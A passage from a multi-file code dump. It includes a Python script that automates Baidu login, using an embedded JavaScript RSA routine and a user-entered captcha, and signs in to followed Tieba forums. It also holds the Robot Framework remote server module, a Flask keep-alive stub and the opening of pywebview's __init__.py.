return n = biShiftRight(n, u), i.isNeg = t.isNeg != s, t.isNeg && (i = s ? biAdd(i, bigOne) : biSubtract(i, bigOne), e = biShiftRight(e, u), n = biSubtract(e, n)), 0 == n.digits[0] && 0 == biHighIndex(n) && (n.isNeg = !1), new Array(i, n)
}
function biDivide(t, e) {
return biDivideModulo(t, e)[0]
}
function biModulo(t, e) {
return biDivideModulo(t, e)[1]
}
function biMultiplyMod(t, e, i) {
return biModulo(biMultiply(t, e), i)
}
function biPow(t, e) {
for (var i = bigOne, n = t; 0 != (1 & e) && (i = biMultiply(i, n)), e >>= 1, 0 != e;) n = biMultiply(n, n);
return i
}
function biPowMod(t, e, i) {
for (var n = bigOne, r = t, o = e; 0 != (1 & o.digits[0]) && (n = biMultiplyMod(n, r, i)), o = biShiftRight(o, 1), 0 != o.digits[0] || 0 != biHighIndex(o);) r = biMultiplyMod(r, r, i);
return n
}
function RSAKeyPair(t, e, i) {
this.e = biFromHex(t),
this.d = biFromHex(e),
this.m = biFromHex(i),
console.log(this.e), console.log(this.d), console.log(this.m),
this.chunkSize = 2 * biHighIndex(this.m),
this.radix = 16,
this.barrett = new BarrettMu(this.m)
}
function twoDigit(t) {
return (10 > t ? "0" : "") + String(t)
}
function encryptedString(t, e) {
for (var i = new Array, n = e.length, r = 0; n > r;) i[r] = e.charCodeAt(r), r++;
for (; i.length % t.chunkSize != 0;) i[r++] = 0;
var o, s, a, u = i.length,
c = "";
for (r = 0; u > r; r += t.chunkSize) {
for (a = new BigInt, o = 0, s = r; s < r + t.chunkSize; ++o) a.digits[o] = i[s++], a.digits[o] += i[s++] << 8;
var l = t.barrett.powMod(a, t.e),
d = 16 == t.radix ? biToHex(l) : biToString(l, t.radix);
c += d + " "
}
return c.substring(0, c.length - 1)
}
function encryptPass(pass, serverTime) {
var password = SBCtoDBC(pass) + serverTime;
setMaxDigits(131);
console.log(password);
var u = new RSAKeyPair("10001", "", "B3C61EBBA4659C4CE3639287EE871F1F48F7930EA977991C7AFE3CC442FEA49643212E7D570C853F368065CC57A2014666DA8AE7D493FD47D171C0D894EEE3ED7F99F6798B7FFD7B5873227038AD23E3197631A8CB642213B9F27D4901AB0D92BFA27542AE890855396ED92775255C977F5C302F1E7ED4B1E369C12CB6B1822F");
password = encryptedString(u, password);
console.log(password);
return password;
}
function SBCtoDBC(t) {
var e = "";
if (t) {
for (var i = t.length, n = 0; i > n; n++) {
var r = t.charCodeAt(n);
r = r >= 65281 && 65374 >= r ? r - 65248 : r, r = 12288 == r ? 32 : r, e += String.fromCharCode(r)
}
return e
}
}
function decryptedString(t, e) {
var i, n, r, o = e.split(" "),
s = "";
for (i = 0; i < o.length; ++i) {
var a;
for (a = 16 == t.radix ? biFromHex(o[i]) : biFromString(o[i], t.radix), r = t.barrett.powMod(a, t.d), n = 0; n <= biHighIndex(r); ++n) s += String.fromCharCode(255 & r.digits[n], r.digits[n] >> 8)
}
return 0 == s.charCodeAt(s.length - 1) && (s = s.substring(0, s.length - 1)), s
}
var biRadixBase = 2,
biRadixBits = 16,
bitsPerDigit = biRadixBits,
biRadix = 65536,
biHalfRadix = biRadix >>> 1,
biRadixSquared = biRadix * biRadix,
maxDigitVal = biRadix - 1,
maxInteger = 9999999999999998,
maxDigits, ZERO_ARRAY, bigZero, bigOne;
setMaxDigits(20);
var dpl10 = 15,
lr10 = biFromNumber(1e15),
hexatrigesimalToChar = new Array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"),
hexToChar = new Array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f"),
highBitMasks = new Array(0, 32768, 49152, 57344, 61440, 63488, 64512, 65024, 65280, 65408, 65472, 65504, 65520, 65528, 65532, 65534, 65535),
lowBitMasks = new Array(0, 1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, 16383, 32767, 65535);
"""
class InputWindow(Frame):
def __init__(self, parent, image):
Frame.__init__(self, parent)
self.parent = parent
self.pack()
self.centerWindow()
if isinstance(image, (str)): # 文件名
self.photo = PhotoImage(file=image)
else: # 二进制
self.photo = PhotoImage(data=image)
self.createWidgets()
def centerWindow(self):
w = 200
h = 120
sw = self.parent.winfo_screenwidth()
sh = self.parent.winfo_screenheight()
x = (sw - w)/2
y = (sh - h)/2
self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))
def createWidgets(self):
self.label = Label(self, image=self.photo)
self.label.image = self.photo # keep a reference!
self.label.pack()
self.textInput = Entry(self)
self.textInput.pack()
self.okButton = Button(self, text="确定", command=self.confirm)
self.okButton.pack()
def confirm(self):
"""验证码输入完则赋值给全局变量verifyCode"""
name = self.textInput.get()
if len(name) == 4:
global verifyCode
verifyCode = name
self.destroy()
self.quit()
else:
messagebox.showinfo("提示", "验证码格式不正确!")
def getTimestamp():
return str(int(time.time() * 1000))
def getServerTime():
url = "https://wappass.baidu.com/wp/api/security/antireplaytoken?v=" + getTimestamp()
res = requests.get(url)
try:
return res.json()["time"]
except:
return ""
def inputUsernameAndPassword():
_username = input("请输入用户名:")
_password = getpass.getpass("请输入密码(不会显示出来):")
return (_username, _password)
def getUID():
url = "https://wappass.baidu.com/passport/?login"
res = requests.get(url)
return res.cookies["BAIDU_WISE_UID"][0:-3] + str(random.randint(100,999))
def getGID():
def transform(char):
"""算法来自base_xxxx.js"""
if char == "4" or char == "-": return char
number = random.randint(0, 15)
if char != "x": number = 3 & number | 8
return format(number, "x").upper()
return "".join([transform(c) for c in "xxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx"])
def encryptPassword(password, servertime):
ctx = execjs.compile(baiduRSAjs)
return ctx.call("encryptPass", password, servertime)
def getVerifycodeImage(url):
res = requests.get(url)
if res.status_code == 200:
inBuff = BytesIO(res.content) # 从字节流创建
outBuff = BytesIO() # 创建一个输出流
im = Image.open(inBuff) # 从ByteIO对象创建一个Image对象
im.save(outBuff, "GIF") # Image转换字节流到GIF字节流
# localFile = "verifycodeImage.gif"
# open(localFile, "wb").write(outBuff.getvalue())
return outBuff.getvalue()
return
def showVerifycodeImage(image):
""" 弹GUI窗口显示验证码,获取用户输入 """
root = Tk()
app = InputWindow(root, image=image)
app.master.title("验证码输入")
# 窗口置顶
root.lift()
root.call('wm', 'attributes', '.', '-topmost', True)
root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False)
root.mainloop()
def loginReq(params):
anyCookie = {"aaaa": "2A64BAAC0FF64743A2CE8A60A71075E7"} # 要随便带一个Cookie,不然服务器返回:”开启cookie之后才能登录“
url = "https://wappass.baidu.com/wp/api/login"
res = requests.post(url, data=params, cookies=anyCookie)
pprint.pprint(res.json())
errCode, errMsg, codeString = res.json()["errInfo"]["no"], res.json()["errInfo"]["msg"], res.json()["data"]["codeString"]
cookie = res.cookies
gotoUrl = res.json()["data"]["gotoUrl"]
return errCode, errMsg, codeString, cookie, gotoUrl
def saveCookiesForUser(username, cookie):
cookieFile = os.path.join(appDir, username + ".cookies")
with open(cookieFile, 'wb') as f:
pickle.dump(cookie, f)
def loadCookiesForUser(username):
print("\n用户:" + username, flush=True)
cookieFile = os.path.join(appDir, username + ".cookies")
with open(cookieFile, 'rb') as f:
return pickle.load(f)
def login(username, password):
servertime = getServerTime()
gid = getGID()
password = encryptPassword(password, servertime)
postData = {
"username" : username,
"password" : password,
"servertime" : servertime,
"gid" : gid,
"verifycode" : "",
"vcodestr" : "",
# "clientfrom" : "native",
# "client" : "ios",
"logLoginType" : "sdk_login",
}
errCode = "-1"
while errCode != "0":
# pprint.pprint(postData)
errCode, errMsg, verifycodeToken, cookie, gotoUrl = loginReq(postData)
print(errMsg, flush=True)
if errCode in ["500001", "500002"]: # 需要输入验证码
verifycodeURL = "https://wappass.baidu.com/cgi-bin/genimage?" + verifycodeToken + "&v=" + getTimestamp()
imageData = getVerifycodeImage(verifycodeURL)
showVerifycodeImage(imageData)
global verifyCode
if verifyCode == "":
print("用户取消输入")
break # 如果用户点击系统的窗口关闭按钮
print("用户输入:" + verifyCode, flush=True)
postData["verifycode"] = verifyCode
postData["vcodestr"] = verifycodeToken
elif errCode in ["400101", "400023", "400032", "400034", "120016", "400024"]: # 需要验证手机短信什么的
print("\n需要安全验证,请打开网址进行:" + gotoUrl)
break
elif errCode == "0": # 登录成功
# 保存cookie,return True
saveCookiesForUser(username, cookie)
print(cookie)
print("\n" , username , " 登录成功!\n")
break
else: # 密码错误之类的
print("\n无法处理,退出")
break
def getUsersTieba(cookie):
print("\n获取喜欢的贴吧...")
url = "http://tieba.baidu.com/mo/q/?type=json&page=like"
res = requests.get(url, cookies=cookie)
html = res.json()["like"]["html"]
result = []
soup = BeautifulSoup(html, "html.parser")
for node in soup("li"):
item = node.a["data-fid"], node.a["data-start-app-param"], node.a.contents[-1].string # 最后一个div的值是级数(level)
result.append(item)
# print(item, flush=True)
return result
def signin(tiebars, cookie):
""" 循环签到用户的贴吧 """
tbsUrl = "http://tieba.baidu.com/dc/common/tbs"
tbs = requests.get(tbsUrl, cookies=cookie, timeout=0.5).json()["tbs"]
signinUrl = "http://tieba.baidu.com/mo/q/sign?is_like=1&mo_device=1&tbs=" + tbs
threads = []
print("\n开始签到...")
for bar in tiebars:
params = { "kw" : bar[1], "fid" : bar[0] }
# signOneBar(signinUrl, bar, params, cookie)
t = Thread(target=signOneBar, args=(signinUrl, bar, params, cookie))
threads.append(t)
t.start()
for child in threads: child.join() # 等待所有子线程完成再往下进行
def signOneBar(url, bar, params, cookie):
try:
signinRes = requests.get(url, params=params, cookies=cookie).json()
if signinRes["no"] == 0:
errCode = "成功"
errMsg = "经验:" + signinRes["error"]
else:
errCode = str(signinRes["no"])
errMsg = signinRes["error"]
res = bar[1] + "\t-- 级数:" + bar[2] + ", 结果:" + errCode + ", 信息: " + errMsg
print(res, flush=True)
except Exception as e:
print("error: ", e, flush=True)
def getLoginedUsers():
"""在当前目录下搜索.cookies结尾的文件,以确定哪些用户已登录"""
files = list(filter(lambda n: n.endswith(".cookies"), os.listdir(appDir)))
usernames = list(map(lambda f: f.split(".")[0], files ))
return usernames
def startLogin():
(username, password) = inputUsernameAndPassword()
global verifyCode
verifyCode = ""
login(username, password)
def startSignin():
users = getLoginedUsers()
if len(users) == 0:
print("无登录用户,退出")
sys.exit(0)
print("\n已登录用户:" , users, flush=True)
for user in users:
try:
cookie = loadCookiesForUser(user)
bars = getUsersTieba(cookie)
signin(bars, cookie)
except Exception as e:
print(e)
print("\n下一个...\n", flush=True)
print("====================== 完成一轮 ======================\n")
if __name__ == "__main__":
print("运行...")
fullPath = os.path.realpath(__file__)
appDir = os.path.dirname(fullPath)
# print(appDir)
if len(sys.argv) == 2 and sys.argv[1] == "-l":
print("===== 登录模式 =====")
startLogin()
else:
print("===== 签到模式 =====")
startSignin()
time.sleep(20) # 20秒后再来一次
startSignin()
|
robotremoteserver.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from collections import Mapping
import inspect
import os
import re
import select
import signal
import sys
import threading
import traceback
if sys.version_info < (3,):
from SimpleXMLRPCServer import SimpleXMLRPCServer
from StringIO import StringIO
from xmlrpclib import Binary, ServerProxy
PY2, PY3 = True, False
else:
from io import StringIO
from xmlrpc.client import Binary, ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
PY2, PY3 = False, True
unicode = str
long = int
__all__ = ['RobotRemoteServer', 'stop_remote_server', 'test_remote_server']
__version__ = '1.1.1.dev1'
BINARY = re.compile('[\x00-\x08\x0B\x0C\x0E-\x1F]')
NON_ASCII = re.compile('[\x80-\xff]')
class RobotRemoteServer(object):
def __init__(self, library, host='127.0.0.1', port=8270, port_file=None,
allow_stop='DEPRECATED', serve=True, allow_remote_stop=True):
"""Configure and start-up remote server.
:param library: Test library instance or module to host.
:param host: Address to listen. Use ``'0.0.0.0'`` to listen
to all available interfaces.
:param port: Port to listen. Use ``0`` to select a free port
automatically. Can be given as an integer or as
a string.
:param port_file: File to write the port that is used. ``None`` means
no such file is written. Port file is created after
the server is started and removed automatically
after it has stopped.
:param allow_stop: DEPRECATED since version 1.1. Use
``allow_remote_stop`` instead.
:param serve: If ``True``, start the server automatically and
wait for it to be stopped.
:param allow_remote_stop: Allow/disallow stopping the server using
``Stop Remote Server`` keyword and
``stop_remote_server`` XML-RPC method.
"""
self._library = RemoteLibraryFactory(library)
self._server = StoppableXMLRPCServer(host, int(port))
self._register_functions(self._server)
self._port_file = port_file
self._allow_remote_stop = allow_remote_stop \
if allow_stop == 'DEPRECATED' else allow_stop
if serve:
self.serve()
def _register_functions(self, server):
server.register_function(self.get_keyword_names)
server.register_function(self.run_keyword)
server.register_function(self.get_keyword_arguments)
server.register_function(self.get_keyword_documentation)
server.register_function(self.stop_remote_server)
@property
def server_address(self):
"""Server address as a tuple ``(host, port)``."""
return self._server.server_address
@property
def server_port(self):
"""Server port as an integer.
If the initial given port is 0, also this property returns 0 until
the server is activated.
"""
return self._server.server_address[1]
def activate(self):
"""Bind port and activate the server but do not yet start serving.
:return Port number that the server is going to use. This is the
actual port to use, even if the initially given port is 0.
"""
return self._server.activate()
def serve(self, log=True):
"""Start the server and wait for it to be stopped.
:param log: When ``True``, print messages about start and stop to
the console.
Automatically activates the server if it is not activated already.
If this method is executed in the main thread, automatically registers
signals SIGINT, SIGTERM and SIGHUP to stop the server.
Using this method requires using ``serve=False`` when initializing the
server. Using ``serve=True`` is equal to first using ``serve=False``
and then calling this method.
In addition to signals, the server can be stopped with the ``Stop
Remote Server`` keyword and the ``stop_remote_serve`` XML-RPC method,
unless they are disabled when the server is initialized. If this method
is executed in a thread, then it is also possible to stop the server
using the :meth:`stop` method.
"""
self._server.activate()
self._announce_start(log, self._port_file)
with SignalHandler(self.stop):
self._server.serve()
self._announce_stop(log, self._port_file)
def _announce_start(self, log, port_file):
self._log('started', log)
if port_file:
with open(port_file, 'w') as pf:
pf.write(str(self.server_port))
def _announce_stop(self, log, port_file):
self._log('stopped', log)
if port_file and os.path.exists(port_file):
os.remove(port_file)
def _log(self, action, log=True, warn=False):
if log:
address = '%s:%s' % self.server_address
if warn:
print('*WARN*', end=' ')
print('Robot Framework remote server at %s %s.' % (address, action))
def stop(self):
"""Stop server."""
self._server.stop()
# Exposed XML-RPC methods. Should they be moved to own class?
def stop_remote_server(self, log=True):
if not self._allow_remote_stop:
self._log('does not allow stopping', log, warn=True)
return False
self.stop()
return True
def get_keyword_names(self):
return self._library.get_keyword_names() + ['stop_remote_server']
def run_keyword(self, name, args, kwargs=None):
if name == 'stop_remote_server':
return KeywordRunner(self.stop_remote_server).run_keyword(args, kwargs)
return self._library.run_keyword(name, args, kwargs)
def get_keyword_arguments(self, name):
if name == 'stop_remote_server':
return []
return self._library.get_keyword_arguments(name)
def get_keyword_documentation(self, name):
if name == 'stop_remote_server':
return ('Stop the remote server unless stopping is disabled.\n\n'
'Return ``True/False`` depending was server stopped or not.')
return self._library.get_keyword_documentation(name)
def get_keyword_tags(self, name):
if name == 'stop_remote_server':
return []
return self._library.get_keyword_tags(name)
class StoppableXMLRPCServer(SimpleXMLRPCServer):
allow_reuse_address = True
def __init__(self, host, port):
SimpleXMLRPCServer.__init__(self, (host, port), logRequests=False,
bind_and_activate=False)
self._activated = False
self._stopper_thread = None
def activate(self):
if not self._activated:
self.server_bind()
self.server_activate()
self._activated = True
return self.server_address[1]
def serve(self):
self.activate()
try:
self.serve_forever()
except select.error:
# Signals seem to cause this error with Python 2.6.
if sys.version_info[:2] > (2, 6):
raise
self.server_close()
if self._stopper_thread:
self._stopper_thread.join()
self._stopper_thread = None
def stop(self):
self._stopper_thread = threading.Thread(target=self.shutdown)
self._stopper_thread.daemon = True
self._stopper_thread.start()
class SignalHandler(object):
def __init__(self, handler):
self._handler = lambda signum, frame: handler()
self._original = {}
def __enter__(self):
for name in 'SIGINT', 'SIGTERM', 'SIGHUP':
if hasattr(signal, name):
try:
orig = signal.signal(getattr(signal, name), self._handler)
except ValueError: # Not in main thread
return
self._original[name] = orig
def __exit__(self, *exc_info):
while self._original:
name, handler = self._original.popitem()
signal.signal(getattr(signal, name), handler)
def RemoteLibraryFactory(library):
if inspect.ismodule(library):
return StaticRemoteLibrary(library)
get_keyword_names = dynamic_method(library, 'get_keyword_names')
if not get_keyword_names:
return StaticRemoteLibrary(library)
run_keyword = dynamic_method(library, 'run_keyword')
if not run_keyword:
return HybridRemoteLibrary(library, get_keyword_names)
return DynamicRemoteLibrary(library, get_keyword_names, run_keyword)
def dynamic_method(library, underscore_name):
tokens = underscore_name.split('_')
camelcase_name = tokens[0] + ''.join(t.title() for t in tokens[1:])
for name in underscore_name, camelcase_name:
method = getattr(library, name, None)
if method and is_function_or_method(method):
return method
return None
def is_function_or_method(item):
return inspect.isfunction(item) or inspect.ismethod(item)
class StaticRemoteLibrary(object):
def __init__(self, library):
self._library = library
self._names, self._robot_name_index = self._get_keyword_names(library)
def _get_keyword_names(self, library):
names = []
robot_name_index = {}
for name, kw in inspect.getmembers(library):
if is_function_or_method(kw):
if getattr(kw, 'robot_name', None):
names.append(kw.robot_name)
robot_name_index[kw.robot_name] = name
elif name[0] != '_':
names.append(name)
return names, robot_name_index
def get_keyword_names(self):
return self._names
def run_keyword(self, name, args, kwargs=None):
kw = self._get_keyword(name)
return KeywordRunner(kw).run_keyword(args, kwargs)
def _get_keyword(self, name):
if name in self._robot_name_index:
name = self._robot_name_index[name]
return getattr(self._library, name)
def get_keyword_arguments(self, name):
if __name__ == '__init__':
return []
kw = self._get_keyword(name)
args, varargs, kwargs, defaults = inspect.getargspec(kw)
if inspect.ismethod(kw):
args = args[1:] # drop 'self'
if defaults:
args, names = args[:-len(defaults)], args[-len(defaults):]
args += ['%s=%s' % (n, d) for n, d in zip(names, defaults)]
if varargs:
args.append('*%s' % varargs)
if kwargs:
args.append('**%s' % kwargs)
return args
def get_keyword_documentation(self, name):
if name == '__intro__':
source = self._library
elif name == '__init__':
source = self._get_init(self._library)
else:
source = self._get_keyword(name)
return inspect.getdoc(source) or ''
def _get_init(self, library):
if inspect.ismodule(library):
return None
init = getattr(library, '__init__', None)
return init if self._is_valid_init(init) else None
def _is_valid_init(self, init):
if not init:
return False
# https://bitbucket.org/pypy/pypy/issues/2462/
if 'PyPy' in sys.version:
if PY2:
return init.__func__ is not object.__init__.__func__
return init is not object.__init__
return is_function_or_method(init)
def get_keyword_tags(self, name):
keyword = self._get_keyword(name)
return getattr(keyword, 'robot_tags', [])
class HybridRemoteLibrary(StaticRemoteLibrary):
def __init__(self, library, get_keyword_names):
StaticRemoteLibrary.__init__(self, library)
self.get_keyword_names = get_keyword_names
class DynamicRemoteLibrary(HybridRemoteLibrary):
def __init__(self, library, get_keyword_names, run_keyword):
HybridRemoteLibrary.__init__(self, library, get_keyword_names)
self._run_keyword = run_keyword
self._supports_kwargs = self._get_kwargs_support(run_keyword)
self._get_keyword_arguments \
= dynamic_method(library, 'get_keyword_arguments')
self._get_keyword_documentation \
= dynamic_method(library, 'get_keyword_documentation')
self._get_keyword_tags \
= dynamic_method(library, 'get_keyword_tags')
def _get_kwargs_support(self, run_keyword):
spec = inspect.getargspec(run_keyword)
return len(spec.args) > 3 # self, name, args, kwargs=None
def run_keyword(self, name, args, kwargs=None):
args = [name, args, kwargs] if kwargs else [name, args]
return KeywordRunner(self._run_keyword).run_keyword(args)
def get_keyword_arguments(self, name):
if self._get_keyword_arguments:
return self._get_keyword_arguments(name)
if self._supports_kwargs:
return ['*varargs', '**kwargs']
return ['*varargs']
def get_keyword_documentation(self, name):
if self._get_keyword_documentation:
return self._get_keyword_documentation(name)
return ''
def get_keyword_tags(self, name):
if self._get_keyword_tags:
return self._get_keyword_tags(name)
return []
class KeywordRunner(object):
def __init__(self, keyword):
self._keyword = keyword
def run_keyword(self, args, kwargs=None):
args = self._handle_binary(args)
kwargs = self._handle_binary(kwargs or {})
result = KeywordResult()
with StandardStreamInterceptor() as interceptor:
try:
return_value = self._keyword(*args, **kwargs)
except Exception:
result.set_error(*sys.exc_info())
else:
try:
result.set_return(return_value)
except Exception:
result.set_error(*sys.exc_info()[:2])
else:
result.set_status('PASS')
result.set_output(interceptor.output)
return result.data
def _handle_binary(self, arg):
# No need to compare against other iterables or mappings because we
# only get actual lists and dicts over XML-RPC. Binary cannot be
# a dictionary key either.
if isinstance(arg, list):
return [self._handle_binary(item) for item in arg]
if isinstance(arg, dict):
return dict((key, self._handle_binary(arg[key])) for key in arg)
if isinstance(arg, Binary):
return arg.data
return arg
class StandardStreamInterceptor(object):
def __init__(self):
self.output = ''
self.origout = sys.stdout
self.origerr = sys.stderr
sys.stdout = StringIO()
sys.stderr = StringIO()
def __enter__(self):
return self
def __exit__(self, *exc_info):
stdout = sys.stdout.getvalue()
stderr = sys.stderr.getvalue()
close = [sys.stdout, sys.stderr]
sys.stdout = self.origout
sys.stderr = self.origerr
for stream in close:
stream.close()
if stdout and stderr:
if not stderr.startswith(('*TRACE*', '*DEBUG*', '*INFO*', '*HTML*',
'*WARN*', '*ERROR*')):
stderr = '*INFO* %s' % stderr
if not stdout.endswith('\n'):
stdout += '\n'
self.output = stdout + stderr
class KeywordResult(object):
_generic_exceptions = (AssertionError, RuntimeError, Exception)
def __init__(self):
self.data = {'status': 'FAIL'}
def set_error(self, exc_type, exc_value, exc_tb=None):
self.data['error'] = self._get_message(exc_type, exc_value)
if exc_tb:
self.data['traceback'] = self._get_traceback(exc_tb)
continuable = self._get_error_attribute(exc_value, 'CONTINUE')
if continuable:
self.data['continuable'] = continuable
fatal = self._get_error_attribute(exc_value, 'EXIT')
if fatal:
self.data['fatal'] = fatal
def _get_message(self, exc_type, exc_value):
name = exc_type.__name__
message = self._get_message_from_exception(exc_value)
if not message:
return name
if exc_type in self._generic_exceptions \
or getattr(exc_value, 'ROBOT_SUPPRESS_NAME', False):
return message
return '%s: %s' % (name, message)
def _get_message_from_exception(self, value):
# UnicodeError occurs if message contains non-ASCII bytes
try:
msg = unicode(value)
except UnicodeError:
msg = ' '.join(self._str(a, handle_binary=False) for a in value.args)
return self._handle_binary_result(msg)
def _get_traceback(self, exc_tb):
# Latest entry originates from this module so it can be removed
entries = traceback.extract_tb(exc_tb)[1:]
trace = ''.join(traceback.format_list(entries))
return 'Traceback (most recent call last):\n' + trace
def _get_error_attribute(self, exc_value, name):
return bool(getattr(exc_value, 'ROBOT_%s_ON_FAILURE' % name, False))
def set_return(self, value):
value = self._handle_return_value(value)
if value != '':
self.data['return'] = value
def _handle_return_value(self, ret):
if isinstance(ret, (str, unicode, bytes)):
return self._handle_binary_result(ret)
if isinstance(ret, (int, long, float)):
return ret
if isinstance(ret, Mapping):
return dict((self._str(key), self._handle_return_value(value))
for key, value in ret.items())
try:
return [self._handle_return_value(item) for item in ret]
except TypeError:
return self._str(ret)
def _handle_binary_result(self, result):
if not self._contains_binary(result):
return result
if not isinstance(result, bytes):
try:
result = result.encode('ASCII')
except UnicodeError:
raise ValueError("Cannot represent %r as binary." % result)
# With IronPython Binary cannot be sent if it contains "real" bytes.
if sys.platform == 'cli':
result = str(result)
return Binary(result)
def _contains_binary(self, result):
if PY3:
return isinstance(result, bytes) or BINARY.search(result)
return (isinstance(result, bytes) and NON_ASCII.search(result) or
BINARY.search(result))
def _str(self, item, handle_binary=True):
if item is None:
return ''
if not isinstance(item, (str, unicode, bytes)):
item = unicode(item)
if handle_binary:
item = self._handle_binary_result(item)
return item
def set_status(self, status):
self.data['status'] = status
def set_output(self, output):
if output:
self.data['output'] = self._handle_binary_result(output)
def test_remote_server(uri, log=True):
"""Test is remote server running.
:param uri: Server address.
:param log: Log status message or not.
:return ``True`` if server is running, ``False`` otherwise.
"""
logger = print if log else lambda message: None
try:
ServerProxy(uri).get_keyword_names()
except Exception:
logger('No remote server running at %s.' % uri)
return False
logger('Remote server running at %s.' % uri)
return True
def stop_remote_server(uri, log=True):
"""Stop remote server unless server has disabled stopping.
:param uri: Server address.
:param log: Log status message or not.
:return ``True`` if server was stopped or it was not running in
the first place, ``False`` otherwise.
"""
logger = print if log else lambda message: None
if not test_remote_server(uri, log=False):
logger('No remote server running at %s.' % uri)
return True
logger('Stopping remote server at %s.' % uri)
if not ServerProxy(uri).stop_remote_server():
logger('Stopping not allowed!')
return False
return True
if __name__ == '__main__':
def parse_args(script, *args):
actions = {'stop': stop_remote_server, 'test': test_remote_server}
if not (0 < len(args) < 3) or args[0] not in actions:
sys.exit('Usage: %s {test|stop} [uri]' % os.path.basename(script))
uri = args[1] if len(args) == 2 else 'http://127.0.0.1:8270'
if '://' not in uri:
uri = 'http://' + uri
return actions[args[0]], uri
action, uri = parse_args(*sys.argv)
success = action(uri)
sys.exit(0 if success else 1)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows to display HTML content in its
own dedicated window. Works on Windows, OS X and Linux and compatible with Python 2 and 3.
(C) 2014-2018 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import json
import logging
import os
import platform
import re
import sys
from threading import Event, Thread, current_thread
from uuid import uuid4
from functools import wraps
from webview.util import base_uri, parse_file_type, escape_string, transform_url, make_unicode, escape_line_breaks, inject_base_uri
from .js import css
from .localization import localization
logger = logging.getLogger('pywebview')
handler = logging.StreamHandler()
formatter = logging.Formatter('[pywebview] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
class Config (dict):
def __init__(self):
self.use_qt = 'USE_QT' in os.environ
self.use_win32 = 'USE_WIN32' in os.environ
self.gui = 'qt' if 'KDE_FULL_SESSION' in os.environ else None
self.gui = os.environ['PYWEBVIEW_GUI'].lower() \
if 'PYWEBVIEW_GUI' in os.environ and os.environ['PYWEBVIEW_GUI'].lower() in ['qt', 'gtk', 'win32'] \
else None
def __getitem__(self, key):
return getattr(self, key.lower())
def __setitem__(self, key, value):
setattr(self, key.lower(), value)
config = Config()
_initialized = False
_webview_ready = Event()
def _initialize_imports():
def import_gtk():
global gui
try:
import webview.gtk as gui
logger.debug('Using GTK')
return True
except (ImportError, ValueError) as e:
logger.exception('GTK cannot be loaded')
return False
def import_qt():
global gui
try:
import webview.qt as gui
logger.debug('Using QT')
return True
except ImportError as e:
logger.exception('QT cannot be loaded')
return False
def import_cocoa():
global gui
try:
import webview.cocoa as gui
return True
except ImportError:
logger.exception('PyObjC cannot be loaded')
return False
def import_win32():
global gui
try:
import webview.win32 as gui
logger.debug('Using Win32')
return True
except ImportError as e:
logger.exception('PyWin32 cannot be loaded')
return False
def import_winforms():
global gui
try:
import webview.winforms as gui
logger.debug('Using .NET')
return True
except ImportError as e:
logger.exception('pythonnet cannot be loaded')
return False
def try_import(guis):
while guis:
import_func = guis.pop(0)
if import_func():
return True
return False
global _initialized
if not _initialized:
if platform.system() == 'Darwin':
if config.gui == 'qt' or config.use_qt:
guis = [import_qt, import_cocoa]
else:
guis = [import_cocoa, import_qt]
if not try_import(guis):
raise Exception('You must have either PyObjC (for Cocoa support) or Qt with Python bindings installed in order to use pywebview.')
elif platform.system() == 'Linux' or platform.system() == 'OpenBSD':
if config.gui == 'gtk' or config.gui != 'qt' and not config.use_qt:
guis = [import_gtk, import_qt]
else:
guis = [import_qt, import_gtk]
if not try_import(guis):
raise Exception('You must have either QT or GTK with Python extensions installed in order to use pywebview.')
elif platform.system() == 'Windows':
if config.gui == 'win32' or config.use_win32:
guis = [import_win32, import_winforms]
else:
guis = [import_winforms, import_win32]
if not try_import(guis):
raise Exception('You must have either pythonnet or pywin32 installed in order to use pywebview.')
else:
raise Exception('Unsupported platform. Only Windows, Linux, OS X, OpenBSD are supported.')
_initialized = True
def _api_call(function):
"""
Decorator to call a pywebview API, checking for _webview_ready and raisings
appropriate Exceptions on failure.
"""
@wraps(function)
def wrapper(*args, **kwargs):
try:
_webview_ready.wait(5)
return function(*args, **kwargs)
except NameError:
raise Exception('Create a web view window first, before invoking this function')
except KeyError:
try:
uid = kwargs['uid']
except KeyError:
# uid not passed as a keyword arg, assumes it to be last in the arg list
uid = args[-1]
raise Exception('Cannot call function: No webview exists with uid: {}'.format(uid))
return wrapper
def create_window(title, url=None, js_api=None, width=800, height=600,
resizable=True, fullscreen=False, min_size=(200, 100), strings={}, confirm_quit=False,
background_color='#FFFFFF', text_select=False, debug=False):
"""
Create a web view window using a native GUI. The execution blocks after this function is invoked, so other
program logic must be executed in a separate thread.
:param title: Window title
:param url: URL to load
:param width: window width. Default is 800px
:param height:window height. Default is 600px
:param resizable True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param strings: a dictionary with localized strings
:param confirm_quit: Display a quit confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
